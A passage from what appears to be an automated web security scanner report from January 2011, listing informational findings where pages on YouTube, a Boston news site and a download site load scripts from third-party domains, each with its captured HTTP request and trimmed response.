Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /top-software-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /top-software-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 140029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1482. http://www.youtube.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://s.ytimg.com/yt/jsbin/www-core-vflzXR69y.js

Request

GET / HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE; use_hitbox=3d11d5cb2b3e40e368f83f82e88170a4dAEAAAAx; GEO=5b80f4299f7903fea6e2637fc3585e04cwsAAAAzVVOtwdbzTTzh/A==;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:40 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: GEO=ffc014281d37870cbf0e0f6c727b6931cwsAAAAzVVOtwdbzTT2iZA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nUXNCUHlydnptdzgtWVhwLWVWelYtM1ZjN21iVTdOb182Zm5RMV9ISjNwRm9HS3lpV1BaeG9n -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...
</script>

<script id="www-core-js" src="//s.ytimg.com/yt/jsbin/www-core-vflzXR69y.js"></script>
...[SNIP]...

21.1483. http://www.youtube.com/subscribe_widget

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /subscribe_widget

Issue detail

The response dynamically includes the following script from another domain:
  • http://s.ytimg.com/yt/jsbin/www-subscribe-widget-vflMJanIs.js

Request

GET /subscribe_widget?p=joomla HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://community.joomla.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:20:43 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: GEO=0341a4aa07c201d99d06557f57bd4ecbcwsAAAAzVVOtwdbzTTzh+w==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 2953

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Subscribe to joomla</title>
<link rel="stylesheet" href="http://s.ytimg.c
...[SNIP]...
</div>

<script src="//s.ytimg.com/yt/jsbin/www-subscribe-widget-vflMJanIs.js"></script>
...[SNIP]...

21.1484. http://www1.whdh.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET / HTTP/1.1
Host: www1.whdh.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:54:37 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Age: 0
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
X-doRedirect: false;
X-Version: 1.0;
Expires: Mon, 24 Jan 2011 21:54:37 GMT
Cache-Control: private, max-age=300
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 60124
Via: 1.1 dfw107007 (MII-APC/1.6)

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH 7NEWS NBC Boston/Regional News, Weather, Traffic, Sports, Entertainment Coverage
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1485. http://www1.whdh.com/contact/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /contact/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /contact/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:02 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 118
Cache-Control: max-age=16035
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 02:22:30 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107005 (MII-APC/1.6)
Content-Length: 10214
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Contact Us</title>
<meta name="publisher" content="New England N
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1486. http://www1.whdh.com/contact/closed-caption-concerns

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /contact/closed-caption-concerns

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /contact/closed-caption-concerns HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:13 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: closed-caption-concerns.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Cache-Control: max-age=172800
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Wed, 26 Jan 2011 21:56:23 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107005 (MII-APC/1.6)
Connection: close
Content-Length: 9050

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Closed Caption Concerns</title>
<meta name="publisher" content="
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1487. http://www1.whdh.com/eupdate/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /eupdate/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /eupdate/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:19 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Pragma: no-cache
Age: 0
Cache-Control: max-age=0
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107003 (MII-APC/1.6)
Connection: close
Content-Length: 8870

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>eUpdate</title>
<meta name="publisher" content="New England News Station Boston Chan
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1488. http://www1.whdh.com/events/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /events/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /events/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:07 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=43028
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 09:54:24 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 13847
Via: 1.1 dfw107003 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Community Calendar</title>
<meta name="publisher" content="New E
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1489. http://www1.whdh.com/expedient

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /expedient

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /expedient HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:18 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: expedient.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:58:07 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107006 (MII-APC/1.6)
Connection: close
Content-Length: 13391

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Expedient Communication's Boston Data Center</title>
<meta name="publisher" content=
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1490. http://www1.whdh.com/fcc/reports

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /fcc/reports

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /fcc/reports HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:15 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: reports.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:58:05 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close
Content-Length: 7840

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>FCC Reports</title>
<meta name="publisher" content="New England News Station Boston
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1491. http://www1.whdh.com/features/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /features/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:27 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7054
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:10 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 16880
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Features</title>
<meta name="publisher" content="New England News Station Boston Cha
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1492. http://www1.whdh.com/features/articles/dish/BO144734/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/dish/BO144734/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://disqus.com/forums/7newsboston/embed.js
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /features/articles/dish/BO144734/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:31 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7056
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:17 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 16927
Via: 1.1 dfw107006 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Dish - Dish: Italian Christmas Eve Feast of 7 fish</title>
<meta name="publisher
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1493. http://www1.whdh.com/features/articles/dish/BO144759/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/dish/BO144759/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://disqus.com/forums/7newsboston/embed.js
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /features/articles/dish/BO144759/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:30 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=3018
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:46:58 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15479
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Dish - Dish: Holiday Cocktails at il Casale</title>
<meta name="publisher" conte
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1494. http://www1.whdh.com/features/articles/dish/BO144797/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/dish/BO144797/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://disqus.com/forums/7newsboston/embed.js
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /features/articles/dish/BO144797/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:30 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=4120
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:05:20 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 16093
Via: 1.1 dfw107005 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Dish - Amelia's pork tenderloin</title>
<meta name="publisher" content="New Engl
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1495. http://www1.whdh.com/features/articles/dish/BO144833/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/dish/BO144833/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://disqus.com/forums/7newsboston/embed.js
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /features/articles/dish/BO144833/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:29 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=456
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:04:16 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15228
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Dish - Dish: Taleggio Mac & Cheese</title>
<meta name="publisher" content="New E
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1496. http://www1.whdh.com/features/articles/hank/BO144372/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/hank/BO144372/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://disqus.com/forums/7newsboston/embed.js
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /features/articles/hank/BO144372/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:54 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=2987
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:46:51 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19084
Via: 1.1 dfw107003 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Hank Investigates - Money Monday - Car Payments</title>
<meta name="publisher" conte
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1497. http://www1.whdh.com/features/articles/hank/BO144452/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/hank/BO144452/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://disqus.com/forums/7newsboston/embed.js
